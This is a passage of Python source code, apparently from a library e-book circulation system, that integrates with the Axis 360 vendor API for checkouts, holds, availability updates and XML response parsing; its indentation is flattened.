now = datetime.utcnow()
five_minutes_ago = now - timedelta(minutes=5)
count = len(list(self.recent_activity(since=five_minutes_ago)))
return "Found %d event(s)" % count
yield self.run_test(
"Asking for circulation events for the last five minutes",
_count_events
)
for result in self.default_patrons(self.collection):
if isinstance(result, SelfTestResult):
yield result
continue
library, patron, pin = result
def _count_activity():
result = self.patron_activity(patron, pin)
return "Found %d loans/holds" % len(result)
yield self.run_test(
"Checking activity for test patron for library %s" % library.name,
_count_activity
)
# Run the tests defined by HasCollectionSelfTests
for result in super(Axis360API, self)._run_self_tests():
yield result
def refresh_bearer_token(self):
url = self.base_url + self.access_token_endpoint
headers = self.authorization_headers
response = self._make_request(
url, 'post', headers, allowed_response_codes=[200]
)
return self.parse_token(response.content)
def request(self, url, method='get', extra_headers={}, data=None,
params=None, exception_on_401=False, **kwargs):
"""Make an HTTP request, acquiring/refreshing a bearer token
if necessary.
"""
if not self.token:
self.token = self.refresh_bearer_token()
headers = dict(extra_headers)
headers['Authorization'] = "Bearer " + self.token
headers['Library'] = self.library_id
if exception_on_401:
disallowed_response_codes = ["401"]
else:
disallowed_response_codes = None
response = self._make_request(
url=url, method=method, headers=headers,
data=data, params=params,
disallowed_response_codes=disallowed_response_codes,
**kwargs
)
if response.status_code == 401:
# This must be our first 401, since our second 401 will
# make _make_request raise a RemoteIntegrationException.
#
# The token has expired. Get a new token and try again.
self.token = None
return self.request(
url=url, method=method, extra_headers=extra_headers,
data=data, params=params, exception_on_401=True,
**kwargs
)
else:
return response
def availability(self, patron_id=None, since=None, title_ids=[]):
url = self.base_url + self.availability_endpoint
args = dict()
if since:
since = since.strftime(self.DATE_FORMAT)
args['updatedDate'] = since
if patron_id:
args['patronId'] = patron_id
if title_ids:
args['titleIds'] = ','.join(title_ids)
response = self.request(url, params=args, timeout=None)
return response
def get_fulfillment_info(self, transaction_id):
"""Make a call to the getFulfillmentInfoAPI."""
url = self.base_url + self.fulfillment_endpoint
params = dict(TransactionID=transaction_id)
return self.request(url, "POST", params=params)
def get_audiobook_metadata(self, findaway_content_id):
"""Make a call to the getaudiobookmetadata endpoint."""
base_url = self.base_url
url = base_url + self.audiobook_metadata_endpoint
params = dict(fndcontentid=findaway_content_id)
response = self.request(url, "POST", params=params)
return response
def checkout(self, patron, pin, licensepool, internal_format):
title_id = licensepool.identifier.identifier
patron_id = patron.authorization_identifier
response = self._checkout(title_id, patron_id, internal_format)
try:
return CheckoutResponseParser(
licensepool.collection).process_all(response.content)
        except etree.XMLSyntaxError as e:
raise RemoteInitiatedServerError(
response.content, self.SERVICE_NAME
)
def _checkout(self, title_id, patron_id, internal_format):
url = self.base_url + "checkout/v2"
args = dict(titleId=title_id, patronId=patron_id,
format=internal_format)
response = self.request(url, data=args, method="POST")
return response
def fulfill(self, patron, pin, licensepool, internal_format, **kwargs):
"""Fulfill a patron's request for a specific book.
:param kwargs: A container for arguments to fulfill()
which are not relevant to this vendor.
:return: a FulfillmentInfo object.
"""
identifier = licensepool.identifier
# This should include only one 'activity'.
activities = self.patron_activity(patron, pin, licensepool.identifier, internal_format)
for loan in activities:
if not isinstance(loan, LoanInfo):
continue
if not (loan.identifier_type == identifier.type
and loan.identifier == identifier.identifier):
continue
# We've found the remote loan corresponding to this
# license pool.
fulfillment = loan.fulfillment_info
if not fulfillment or not isinstance(fulfillment, FulfillmentInfo):
raise CannotFulfill()
return fulfillment
# If we made it to this point, the patron does not have this
# book checked out.
raise NoActiveLoan()
def checkin(self, patron, pin, licensepool):
pass
def place_hold(self, patron, pin, licensepool, hold_notification_email):
if not hold_notification_email:
hold_notification_email = self.default_notification_email_address(
patron, pin
)
url = self.base_url + "addtoHold/v2"
identifier = licensepool.identifier
title_id = identifier.identifier
patron_id = patron.authorization_identifier
params = dict(titleId=title_id, patronId=patron_id,
email=hold_notification_email)
response = self.request(url, params=params)
hold_info = HoldResponseParser(licensepool.collection).process_all(
response.content)
if not hold_info.identifier:
# The Axis 360 API doesn't return the identifier of the
# item that was placed on hold, so we have to fill it in
# based on our own knowledge.
hold_info.identifier_type = identifier.type
hold_info.identifier = identifier.identifier
return hold_info
def release_hold(self, patron, pin, licensepool):
url = self.base_url + "removeHold/v2"
identifier = licensepool.identifier
title_id = identifier.identifier
patron_id = patron.authorization_identifier
params = dict(titleId=title_id, patronId=patron_id)
response = self.request(url, params=params)
try:
HoldReleaseResponseParser(licensepool.collection).process_all(
response.content)
except NotOnHold:
# Fine, it wasn't on hold and now it's still not on hold.
pass
# If we didn't raise an exception, we're fine.
return True
def patron_activity(self, patron, pin, identifier=None, internal_format=None):
if identifier:
title_ids = [identifier.identifier]
else:
title_ids = None
availability = self.availability(
patron_id=patron.authorization_identifier,
title_ids=title_ids)
return list(AvailabilityResponseParser(self, internal_format).process_all(
availability.content))
def update_availability(self, licensepool):
"""Update the availability information for a single LicensePool.
Part of the CirculationAPI interface.
"""
self.update_licensepools_for_identifiers([licensepool.identifier])
def update_licensepools_for_identifiers(self, identifiers):
"""Update availability and bibliographic information for
a list of books.
If the book has never been seen before, a new LicensePool
will be created for the book.
The book's LicensePool will be updated with current
circulation information.
"""
remainder = set(identifiers)
for bibliographic, availability in self._fetch_remote_availability(
identifiers
):
edition, ignore1, license_pool, ignore2 = self.update_book(
bibliographic, availability
)
identifier = license_pool.identifier
if identifier in remainder:
remainder.remove(identifier)
# We asked Axis about n books. It sent us n-k responses. Those
# k books are the identifiers in `remainder`. These books have
# been removed from the collection without us being notified.
for removed_identifier in remainder:
self._reap(removed_identifier)
def update_book(self, bibliographic, availability, analytics=None):
"""Create or update a single book based on bibliographic
and availability data from the Axis 360 API.
:param bibliographic: A Metadata object containing
bibliographic data about this title.
:param availability: A CirculationData object containing
availability data about this title.
"""
analytics = analytics or Analytics(self._db)
license_pool, new_license_pool = availability.license_pool(
self._db, self.collection, analytics
)
edition, new_edition = bibliographic.edition(self._db)
license_pool.edition = edition
policy = ReplacementPolicy(
identifiers=False,
subjects=True,
contributions=True,
formats=True,
links=True,
analytics=analytics,
)
# NOTE: availability is bibliographic.circulation, so it's a
# little redundant to call availability.apply() -- it's taken
# care of inside bibliographic.apply().
bibliographic.apply(edition, self.collection, replace=policy)
availability.apply(self._db, self.collection, replace=policy)
return edition, new_edition, license_pool, new_license_pool
def _fetch_remote_availability(self, identifiers):
"""Retrieve availability information for the specified identifiers.
:yield: A stream of (Metadata, CirculationData) 2-tuples.
"""
identifier_strings = self.create_identifier_strings(identifiers)
response = self.availability(title_ids=identifier_strings)
parser = BibliographicParser(self.collection)
return parser.process_all(response.content)
def _reap(self, identifier):
"""Update our local circulation information to reflect the fact that
the identified book has been removed from the remote
collection.
"""
collection = self.collection
pool = identifier.licensed_through_collection(collection)
if not pool:
self.log.warn(
"Was about to reap %r but no local license pool in this collection.",
identifier
)
return
if pool.licenses_owned == 0:
# Already reaped.
return
self.log.info("Reaping %r", identifier)
availability = CirculationData(
data_source=pool.data_source,
primary_identifier=identifier,
licenses_owned=0,
licenses_available=0,
licenses_reserved=0,
patrons_in_hold_queue=0,
)
availability.apply(
self._db, collection,
ReplacementPolicy.from_license_source(self._db)
)
def recent_activity(self, since):
"""Find books that have had recent activity.
:yield: A sequence of (Metadata, CirculationData) 2-tuples
"""
availability = self.availability(since=since)
content = availability.content
for bibliographic, circulation in BibliographicParser(self.collection).process_all(
content):
yield bibliographic, circulation
@classmethod
def create_identifier_strings(cls, identifiers):
identifier_strings = []
for i in identifiers:
if isinstance(i, Identifier):
value = i.identifier
else:
value = i
identifier_strings.append(value)
return identifier_strings
@classmethod
def parse_token(cls, token):
data = json.loads(token)
return data['access_token']
def _make_request(self, url, method, headers, data=None, params=None,
**kwargs):
"""Actually make an HTTP request."""
return HTTP.request_with_timeout(
method, url, headers=headers, data=data,
params=params, **kwargs
)
class Axis360CirculationMonitor(CollectionMonitor, TimelineMonitor):
"""Maintain LicensePools for Axis 360 titles.
"""
SERVICE_NAME = "Axis 360 Circulation Monitor"
INTERVAL_SECONDS = 60
DEFAULT_BATCH_SIZE = 50
PROTOCOL = ExternalIntegration.AXIS_360
DEFAULT_START_TIME = datetime(1970, 1, 1)
def __init__(self, _db, collection, api_class=Axis360API):
super(Axis360CirculationMonitor, self).__init__(_db, collection)
if isinstance(api_class, Axis360API):
# Use a preexisting Axis360API instance rather than
# creating a new one.
self.api = api_class
else:
self.api = api_class(_db, collection)
self.batch_size = self.DEFAULT_BATCH_SIZE
self.bibliographic_coverage_provider = (
Axis360BibliographicCoverageProvider(collection, api_class=self.api)
)
def catch_up_from(self, start, cutoff, progress):
"""Find Axis 360 books that changed recently.
:progress: A TimestampData representing the time previously
covered by this Monitor.
"""
count = 0
for bibliographic, circulation in self.api.recent_activity(start):
self.process_book(bibliographic, circulation)
count += 1
if count % self.batch_size == 0:
self._db.commit()
progress.achievements = "Modified titles: %d." % count
def process_book(self, bibliographic, circulation):
edition, new_edition, license_pool, new_license_pool = self.api.update_book(
bibliographic, circulation
)
if new_license_pool or new_edition:
# At this point we have done work equivalent to that done by
# the Axis360BibliographicCoverageProvider. Register that the
# work has been done so we don't have to do it again.
identifier = edition.primary_identifier
self.bibliographic_coverage_provider.handle_success(identifier)
self.bibliographic_coverage_provider.add_coverage_record_for(
identifier
)
return edition, license_pool
class MockAxis360API(Axis360API):
@classmethod
    def mock_collection(cls, _db, name="Test Axis 360 Collection"):
"""Create a mock Axis 360 collection for use in tests."""
library = DatabaseTest.make_default_library(_db)
collection, ignore = get_one_or_create(
_db, Collection,
name=name,
create_method_kwargs=dict(
external_account_id=u'c',
)
)
integration = collection.create_external_integration(
protocol=ExternalIntegration.AXIS_360
)
integration.username = u'a'
integration.password = u'b'
integration.url = u"http://axis.test/"
library.collections.append(collection)
return collection
def __init__(self, _db, collection, with_token=True, **kwargs):
"""Constructor.
:param collection: Get Axis 360 credentials from this
Collection.
:param with_token: If True, this class will assume that
it already has a valid token, and will not go through
the motions of negotiating one with the mock server.
"""
super(MockAxis360API, self).__init__(_db, collection, **kwargs)
if with_token:
self.token = "mock token"
self.responses = []
self.requests = []
def queue_response(self, status_code, headers={}, content=None):
from core.testing import MockRequestsResponse
self.responses.insert(
0, MockRequestsResponse(status_code, headers, content)
)
def _make_request(self, url, *args, **kwargs):
self.requests.append([url, args, kwargs])
response = self.responses.pop()
return HTTP._process_response(
url, response, kwargs.get('allowed_response_codes'),
kwargs.get('disallowed_response_codes')
)
class Axis360BibliographicCoverageProvider(BibliographicCoverageProvider):
"""Fill in bibliographic metadata for Axis 360 records.
Currently this is only used by BibliographicRefreshScript. It's
not normally necessary because the Axis 360 API combines
bibliographic and availability data. We rely on Monitors to fetch
availability data and fill in the bibliographic data as necessary.
"""
SERVICE_NAME = "Axis 360 Bibliographic Coverage Provider"
DATA_SOURCE_NAME = DataSource.AXIS_360
PROTOCOL = ExternalIntegration.AXIS_360
INPUT_IDENTIFIER_TYPES = Identifier.AXIS_360_ID
DEFAULT_BATCH_SIZE = 25
def __init__(self, collection, api_class=Axis360API, **kwargs):
"""Constructor.
:param collection: Provide bibliographic coverage to all
Axis 360 books in the given Collection.
:param api_class: Instantiate this class with the given Collection,
rather than instantiating Axis360API.
"""
super(Axis360BibliographicCoverageProvider, self).__init__(
collection, **kwargs
)
if isinstance(api_class, Axis360API):
# We were given a specific Axis360API instance to use.
self.api = api_class
else:
# A web application should not use this option because it
# will put a non-scoped session in the mix.
_db = Session.object_session(collection)
self.api = api_class(_db, collection)
self.parser = BibliographicParser()
def process_batch(self, identifiers):
identifier_strings = self.api.create_identifier_strings(identifiers)
response = self.api.availability(title_ids=identifier_strings)
seen_identifiers = set()
batch_results = []
for metadata, availability in self.parser.process_all(response.content):
identifier, is_new = metadata.primary_identifier.load(self._db)
            if identifier not in identifiers:
# Axis 360 told us about a book we didn't ask
# for. This shouldn't happen, but if it does we should
# do nothing further.
continue
seen_identifiers.add(identifier.identifier)
result = self.set_metadata(identifier, metadata)
if not isinstance(result, CoverageFailure):
result = self.handle_success(identifier)
batch_results.append(result)
# Create a CoverageFailure object for each original identifier
# not mentioned in the results.
for identifier_string in identifier_strings:
if identifier_string not in seen_identifiers:
identifier, ignore = Identifier.for_foreign_id(
self._db, Identifier.AXIS_360_ID, identifier_string
)
result = self.failure(
identifier, "Book not in collection", transient=False
)
batch_results.append(result)
return batch_results
def handle_success(self, identifier):
return self.set_presentation_ready(identifier)
def process_item(self, identifier):
results = self.process_batch([identifier])
return results[0]
class AxisCollectionReaper(IdentifierSweepMonitor):
"""Check for books that are in the local collection but have left our
Axis 360 collection.
"""
SERVICE_NAME = "Axis Collection Reaper"
INTERVAL_SECONDS = 3600*12
PROTOCOL = ExternalIntegration.AXIS_360
def __init__(self, _db, collection, api_class=Axis360API):
super(AxisCollectionReaper, self).__init__(_db, collection)
if isinstance(api_class, Axis360API):
# Use a preexisting Axis360API instance rather than
# creating a new one.
self.api = api_class
else:
self.api = api_class(_db, collection)
def process_items(self, identifiers):
self.api.update_licensepools_for_identifiers(identifiers)
class Axis360Parser(XMLParser):
NS = {"axis": "http://axis360api.baker-taylor.com/vendorAPI"}
SHORT_DATE_FORMAT = "%m/%d/%Y"
FULL_DATE_FORMAT_IMPLICIT_UTC = "%m/%d/%Y %I:%M:%S %p"
FULL_DATE_FORMAT = "%m/%d/%Y %I:%M:%S %p +00:00"
def _xpath1_boolean(self, e, target, ns, default=False):
text = self.text_of_optional_subtag(e, target, ns)
if text is None:
return default
if text == 'true':
return True
else:
return False
def _xpath1_date(self, e, target, ns):
value = self.text_of_optional_subtag(e, target, ns)
if value is None:
return value
try:
attempt = datetime.strptime(
value, self.FULL_DATE_FORMAT_IMPLICIT_UTC)
value += ' +00:00'
except ValueError:
pass
return datetime.strptime(value, self.FULL_DATE_FORMAT)
class BibliographicParser(Axis360Parser):
DELIVERY_DATA_FOR_AXIS_FORMAT = {
"Blio" : None, # Legacy format, handled the same way as AxisNow
"Acoustik" : (None, DeliveryMechanism.FINDAWAY_DRM), # Audiobooks
"AxisNow" : None, # Handled specially, for ebooks only.
"ePub" : (Representation.EPUB_MEDIA_TYPE, DeliveryMechanism.ADOBE_DRM),
"PDF" : (Representation.PDF_MEDIA_TYPE, DeliveryMechanism.ADOBE_DRM),
}
log = logging.getLogger("Axis 360 Bibliographic Parser")
@classmethod
    def parse_list(cls, l):
"""Turn strings like this into lists:
FICTION / Thrillers; FICTION / Suspense; FICTION / General
Ursu, Anne ; Fortune, Eric (ILT)
"""
return [x.strip() for x in l.split(";")]
def __init__(self, include_availability=True, include_bibliographic=True):
self.include_availability = include_availability
self.include_bibliographic = include_bibliographic
def process_all(self, string):
for i in super(BibliographicParser, self).process_all(
string, "//axis:title", self.NS):
yield i
def extract_availability(self, circulation_data, element, ns):
identifier = self.text_of_subtag(element, 'axis:titleId', ns)
primary_identifier = IdentifierData(Identifier.AXIS_360_ID, identifier)
if not circulation_data:
circulation_data = CirculationData(
data_source=DataSource.AXIS_360,
primary_identifier=primary_identifier,
)
availability = self._xpath1(element, 'axis:availability', ns)
total_copies = self.int_of_subtag(availability, 'axis:totalCopies', ns)
available_copies = self.int_of_subtag(
availability, 'axis:availableCopies', ns)
size_of_hold_queue = self.int_of_subtag(
availability, 'axis:holdsQueueSize', ns)
availability_updated = self.text_of_optional_subtag(
availability, 'axis:updateDate', ns)
if availability_updated:
try:
attempt = datetime.strptime(
availability_updated, self.FULL_DATE_FORMAT_IMPLICIT_UTC)
availability_updated += ' +00:00'
except ValueError:
pass
availability_updated = datetime.strptime(
availability_updated, self.FULL_DATE_FORMAT)
        circulation_data.licenses_owned = total_copies
        circulation_data.licenses_available = available_copies
        circulation_data.licenses_reserved = 0
        circulation_data.patrons_in_hold_queue = size_of_hold_queue
return circulation_data
# Axis authors with a special role have an abbreviation after their names,
# e.g. "San Ruby (FRW)"
role_abbreviation = re.compile("\(([A-Z][A-Z][A-Z])\)$")
generic_author = object()
role_abbreviation_to_role = dict(
INT=Contributor.INTRODUCTION_ROLE,
EDT=Contributor.EDITOR_ROLE,
PHT=Contributor.PHOTOGRAPHER_ROLE,
ILT=Contributor.ILLUSTRATOR_ROLE,
TRN=Contributor.TRANSLATOR_ROLE,
FRW=Contributor.FOREWORD_ROLE,
ADP=generic_author, # Author of adaptation
COR=generic_author, # Corporate author
)
@classmethod
def parse_contributor(cls, author, primary_author_found=False,
force_role=None):
"""Parse an Axis 360 contributor string.
The contributor string looks like "Butler, Octavia" or "Walt
Disney Pictures (COR)" or "Rex, Adam (ILT)". The optional
three-letter code describes the contributor's role in the
book.
:param author: The string to parse.
:param primary_author_found: If this is false, then a
contributor with no three-letter code will be treated as
the primary author. If this is true, then a contributor
with no three-letter code will be treated as just a
regular author.
:param force_role: If this is set, the contributor will be
assigned this role, no matter what. This takes precedence
over the value implied by primary_author_found.
"""
if primary_author_found:
default_author_role = Contributor.AUTHOR_ROLE
else:
default_author_role = Contributor.PRIMARY_AUTHOR_ROLE
role = default_author_role
match = cls.role_abbreviation.search(author)
if match:
role_type = match.groups()[0]
role = cls.role_abbreviation_to_role.get(
role_type, Contributor.UNKNOWN_ROLE)
if role is cls.generic_author:
role = default_author_role
author = author[:-5].strip()
if force_role:
role = force_role
return ContributorData(
sort_name=author, roles=[role]
)
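# Illustrative examples (not from the original source; they simply trace the
# logic above):
#   parse_contributor("Rex, Adam (ILT)")
#     -> sort_name "Rex, Adam", roles [Contributor.ILLUSTRATOR_ROLE]
#   parse_contributor("Butler, Octavia")
#     -> sort_name "Butler, Octavia", roles [Contributor.PRIMARY_AUTHOR_ROLE]
#        (no primary author had been seen yet)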
def extract_bibliographic(self, element, ns):
"""Turn bibliographic metadata into a Metadata and a CirculationData objects,
and return them as a tuple."""
# TODO: These are consistently empty (some are clearly for
# audiobooks) so I don't know what they do and/or what format
# they're in.
#
# edition
# runtime
identifier = self.text_of_subtag(element, 'axis:titleId', ns)
isbn = self.text_of_optional_subtag(element, 'axis:isbn', ns)
title = self.text_of_subtag(element, 'axis:productTitle', ns)
contributor = self.text_of_optional_subtag(
element, 'axis:contributor', ns)
contributors = []
found_primary_author = False
if contributor:
for c in self.parse_list(contributor):
contributor = self.parse_contributor(
c, found_primary_author)
if Contributor.PRIMARY_AUTHOR_ROLE in contributor.roles:
found_primary_author = True
contributors.append(contributor)
narrator = self.text_of_optional_subtag(
element, 'axis:narrator', ns
)
if narrator:
for n in self.parse_list(narrator):
contributor = self.parse_contributor(
n, force_role=Contributor.NARRATOR_ROLE
)
contributors.append(contributor)
links = []
description = self.text_of_optional_subtag(
element, 'axis:annotation', ns
)
if description:
links.append(
LinkData(
rel=Hyperlink.DESCRIPTION,
content=description,
media_type=Representation.TEXT_PLAIN,
)
)
subject = self.text_of_optional_subtag(element, 'axis:subject', ns)
subjects = []
if subject:
for subject_identifier in self.parse_list(subject):
subjects.append(
SubjectData(
type=Subject.BISAC, identifier=None,
name=subject_identifier,
weight=Classification.TRUSTED_DISTRIBUTOR_WEIGHT
)
)
publication_date = self.text_of_optional_subtag(
element, 'axis:publicationDate', ns)
if publication_date:
publication_date = datetime.strptime(
publication_date, self.SHORT_DATE_FORMAT)
series = self.text_of_optional_subtag(element, 'axis:series', ns)
publisher = self.text_of_optional_subtag(element, 'axis:publisher', ns)
imprint = self.text_of_optional_subtag(element, 'axis:imprint', ns)
audience = self.text_of_optional_subtag(element, 'axis:audience', ns)
if audience:
subjects.append(
SubjectData(
type=Subject.AXIS_360_AUDIENCE,
identifier=audience,
weight=Classification.TRUSTED_DISTRIBUTOR_WEIGHT,
)
)
language = self.text_of_subtag(element, 'axis:language', ns)
thumbnail_url = self.text_of_optional_subtag(
element, 'axis:imageUrl', ns
)
if thumbnail_url:
# We presume all images from this service are JPEGs.
media_type = MediaTypes.JPEG_MEDIA_TYPE
if '/Medium/' in thumbnail_url:
# We know about a URL hack for this service that lets us
# get a larger image.
full_size_url = thumbnail_url.replace("/Medium/", "/Large/")
else:
# If the URL hack won't work, treat the image we got
# as both the full-sized image and its thumbnail.
# This won't happen unless B&T changes the service.
full_size_url = thumbnail_url
thumbnail = LinkData(
rel=LinkRelations.THUMBNAIL_IMAGE,
href=thumbnail_url,
media_type=media_type
)
image = LinkData(
rel=LinkRelations.IMAGE,
href=full_size_url,
media_type=media_type,
thumbnail=thumbnail
)
links.append(image)
# We don't use this for anything.
# file_size = self.int_of_optional_subtag(element, 'axis:fileSize', ns)
primary_identifier = IdentifierData(Identifier.AXIS_360_ID, identifier)
identifiers = []
if isbn:
identifiers.append(IdentifierData(Identifier.ISBN, isbn))
formats = []
acceptable = False
seen_formats = []
# All of the formats we don't support, like Blio, are ebook
# formats. If this is an audiobook format (Acoustik), we'll
# hear about it below.
medium = Edition.BOOK_MEDIUM
# If AxisNow is mentioned as a format, and this turns out to be a book,
# we'll be adding an extra delivery mechanism.
axisnow_seen = False
# Blio is an older ebook format now used as an alias for AxisNow.
blio_seen = False
for format_tag in self._xpath(
element, 'axis:availability/axis:availableFormats/axis:formatName',
ns
):
informal_name = format_tag.text
seen_formats.append(informal_name)
if informal_name == "Blio":
# We will be adding an AxisNow FormatData.
blio_seen = True
continue
elif informal_name == Axis360API.AXISNOW:
# We will only be adding an AxisNow FormatData if this
# turns out to be an ebook.
axisnow_seen = True
continue
if informal_name not in self.DELIVERY_DATA_FOR_AXIS_FORMAT:
self.log.warn("Unrecognized Axis format name for %s: %s" % (
identifier, informal_name
))
elif self.DELIVERY_DATA_FOR_AXIS_FORMAT.get(informal_name):
content_type, drm_scheme = self.DELIVERY_DATA_FOR_AXIS_FORMAT[
informal_name
]
formats.append(
FormatData(content_type=content_type, drm_scheme=drm_scheme)
)
if drm_scheme == DeliveryMechanism.FINDAWAY_DRM:
medium = Edition.AUDIO_MEDIUM
else:
medium = Edition.BOOK_MEDIUM
if (blio_seen or (axisnow_seen and medium == Edition.BOOK_MEDIUM)):
# This ebook is available through AxisNow. Add an
# appropriate FormatData.
#
# Audiobooks may also be available through AxisNow, but we
# currently ignore that fact.
formats.append(
FormatData(content_type=None, drm_scheme=DeliveryMechanism.AXISNOW_DRM)
)
if not formats:
self.log.error(
"No supported format for %s (%s)! Saw: %s", identifier,
title, ", ".join(seen_formats)
)
metadata = Metadata(
data_source=DataSource.AXIS_360,
title=title,
language=language,
medium=medium,
series=series,
publisher=publisher,
imprint=imprint,
published=publication_date,
primary_identifier=primary_identifier,
identifiers=identifiers,
subjects=subjects,
contributors=contributors,
links=links,
)
circulationdata = CirculationData(
data_source=DataSource.AXIS_360,
primary_identifier=primary_identifier,
formats=formats,
)
metadata.circulation = circulationdata
return metadata
def process_one(self, element, ns):
if self.include_bibliographic:
bibliographic = self.extract_bibliographic(element, ns)
else:
bibliographic = None
passed_availability = None
if bibliographic and bibliographic.circulation:
passed_availability = bibliographic.circulation
if self.include_availability:
availability = self.extract_availability(circulation_data=passed_availability, element=element, ns=ns)
else:
availability = None
return bibliographic, availability
class ResponseParser(Axis360Parser):
id_type = Identifier.AXIS_360_ID
SERVICE_NAME = "Axis 360"
# Map Axis 360 error codes to our circulation exceptions.
code_to_exception = {
315 : InvalidInputException, # Bad password
316 : InvalidInputException, # DRM account already exists
1000 : PatronAuthorizationFailedException,
1001 : PatronAuthorizationFailedException,
1002 : PatronAuthorizationFailedException,
1003 : PatronAuthorizationFailedException,
2000 : LibraryAuthorizationFailedException,
2001 : LibraryAuthorizationFailedException,
2002 : LibraryAuthorizationFailedException,
2003 : LibraryAuthorizationFailedException, # "Encoded input parameters exceed limit", whatever that means
2004 : LibraryAuthorizationFailedException,
2005 : LibraryAuthorizationFailedException, # Invalid credentials / wrong library ID
2007 : LibraryAuthorizationFailedException, # Invalid library ID
2008 : LibraryAuthorizationFailedException, # Invalid library ID
3100 : LibraryInvalidInputException, # Missing title ID
3101 : LibraryInvalidInputException, # Missing patron ID
3102 : LibraryInvalidInputException, # Missing email address (for hold notification)
3103 : NotFoundOnRemote, # Invalid title ID
3104 : LibraryInvalidInputException, # Invalid Email Address (for hold notification)
3105 : PatronAuthorizationFailedException, # Invalid Account Credentials
3106 : InvalidInputException, # Loan Period is out of bounds
3108 : InvalidInputException, # DRM Credentials Required
3109 : InvalidInputException, # Hold already exists or hold does not exist, depending.
3110 : AlreadyCheckedOut,
3111 : CurrentlyAvailable,
3112 : CannotFulfill,
3113 : CannotLoan,
(3113, "Title ID is not available for checkout") : NoAvailableCopies,
3114 : PatronLoanLimitReached,
3115 : LibraryInvalidInputException, # Missing DRM format
3117 : LibraryInvalidInputException, # Invalid DRM format
3118 : LibraryInvalidInputException, # Invalid Patron credentials
3119 : LibraryAuthorizationFailedException, # No Blio account
3120 : LibraryAuthorizationFailedException, # No Acoustik account
3123 : PatronAuthorizationFailedException, # Patron Session ID expired
3126 : LibraryInvalidInputException, # Invalid checkout format
3127 : InvalidInputException, # First name is required
3128 : InvalidInputException, # Last name is required
3130 : LibraryInvalidInputException, # Invalid hold format (?)
3131 : RemoteInitiatedServerError, # Custom error message (?)
3132 : LibraryInvalidInputException, # Invalid delta datetime format
3134 : LibraryInvalidInputException, # Delta datetime format must not be in the future
3135 : NoAcceptableFormat,
3136 : LibraryInvalidInputException, # Missing checkout format
5000 : RemoteInitiatedServerError,
5003 : LibraryInvalidInputException, # Missing TransactionID
5004 : LibraryInvalidInputException, # Missing TransactionID
}
def __init__(self, collection):
"""Constructor.
:param collection: A Collection, in case parsing this document
results in the creation of LoanInfo or HoldInfo objects.
"""
self.collection = collection
def raise_exception_on_error(self, e, ns, custom_error_classes={}):
"""Raise an error if the given lxml node represents an Axis 360 error
condition.
"""
code = self._xpath1(e, '//axis:status/axis:code', ns)
message = self._xpath1(e, '//axis:status/axis:statusMessage', ns)
if message is None:
message = etree.tostring(e)
else:
message = message.text
if code is None:
# Something is so wrong that we don't know what to do.
raise RemoteInitiatedServerError(message, self.SERVICE_NAME)
return self._raise_exception_on_error(
code.text, message, custom_error_classes
)
@classmethod
def _raise_exception_on_error(cls, code, message, custom_error_classes={}):
try:
code = int(code)
except ValueError:
# Non-numeric code? Inconceivable!
raise RemoteInitiatedServerError(
"Invalid response code from Axis 360: %s" % code,
cls.SERVICE_NAME
)
for d in custom_error_classes, cls.code_to_exception:
if (code, message) in d:
raise d[(code, message)]
elif code in d:
# Something went wrong and we know how to turn it into a
# specific exception.
error_class = d[code]
if error_class is RemoteInitiatedServerError:
e = error_class(message, cls.SERVICE_NAME)
else:
e = error_class(message)
raise e
return code, message
class CheckoutResponseParser(ResponseParser):
def process_all(self, string):
for i in super(CheckoutResponseParser, self).process_all(
string, "//axis:checkoutResult", self.NS):
return i
def process_one(self, e, namespaces):
"""Either turn the given document into a LoanInfo
object, or raise an appropriate exception.
"""
self.raise_exception_on_error(e, namespaces)
# If we get to this point it's because the checkout succeeded.
expiration_date = self._xpath1(e, '//axis:expirationDate', namespaces)
fulfillment_url = self._xpath1(e, '//axis:url', namespaces)
if fulfillment_url is not None:
fulfillment_url = fulfillment_url.text
if expiration_date is not None:
expiration_date = expiration_date.text
expiration_date = datetime.strptime(
expiration_date, self.FULL_DATE_FORMAT)
loan_start = datetime.utcnow()
loan = LoanInfo(
collection=self.collection, data_source_name=DataSource.AXIS_360,
identifier_type=self.id_type, identifier=None,
start_date=loan_start,
end_date=expiration_date,
)
return loan
class HoldResponseParser(ResponseParser):
def process_all(self, string):
for i in super(HoldResponseParser, self).process_all(
string, "//axis:addtoholdResult", self.NS):
return i
def process_one(self, e, namespaces):
"""Either turn the given document into a HoldInfo
object, or raise an appropriate exception.
"""
self.raise_exception_on_error(
e, namespaces, {3109 : AlreadyOnHold})
# If we get to this point it's because the hold place succeeded.
queue_position = self._xpath1(
e, '//axis:holdsQueuePosition', namespaces)
if queue_position is None:
queue_position = None
else:
try:
queue_position = int(queue_position.text)
except ValueError:
print "Invalid queue position: %s" % queue_position
queue_position = None
hold_start = datetime.utcnow()
# NOTE: The caller needs to fill in Collection -- we have no idea
# what collection this is.
hold = HoldInfo(
collection=self.collection, data_source_name=DataSource.AXIS_360,
identifier_type=self.id_type, identifier=None,
start_date=hold_start, end_date=None, hold_position=queue_position)
return hold
class HoldReleaseResponseParser(ResponseParser):
def process_all(self, string):
for i in super(HoldReleaseResponseParser, self).process_all(
string, "//axis:removeholdResult", self.NS):
return i
def post_process(self, i):
"""Unlike other ResponseParser subclasses, we don't return any type of
\*Info object, so there's no need to do any post-processing.
"""
return i
def process_one(self, e, namespaces):
# There's no data to gather here. Either there was an error
# or we were successful.
self.raise_exception_on_error(
e, namespaces, {3109 : NotOnHold})
return True
class AvailabilityResponseParser(ResponseParser):
def __init__(self, api, internal_format=None):
"""Constructor.
:param api: An Axis360API instance, in case the parsing of an
availability document triggers additional API requests.
:param internal_format: The name Axis 360 gave to the format
the user requested. Used to distinguish books
checked out through the AxisNow Book Vault from books checked
out through ACS.
"""
self.api = api
self.internal_format = internal_format
super(AvailabilityResponseParser, self).__init__(api.collection)
def process_all(self, string):
for info in super(AvailabilityResponseParser, self).process_all(
string, "//axis:title", self.NS):
# Filter out books where nothing in particular is
# happening.
if info:
yield info
def process_one(self, e, ns):
# Figure out which book we're talking about.
axis_identifier = self.text_of_subtag(e, "axis:titleId", ns)
availability = self._xpath1(e, 'axis:availability', ns)
if availability is None:
return None
reserved = self._xpath1_boolean(availability, 'axis:isReserved', ns)
checked_out = self._xpath1_boolean(availability, 'axis:isCheckedout', ns)
on_hold = self._xpath1_boolean(availability, 'axis:isInHoldQueue', ns)
info = None
if checked_out:
start_date = self._xpath1_date(
availability, 'axis:checkoutStartDate', ns)
end_date = self._xpath1_date(
availability, 'axis:checkoutEndDate', ns)
download_url = self.text_of_optional_subtag(
availability, 'axis:downloadUrl', ns)
transaction_id = self.text_of_optional_subtag(
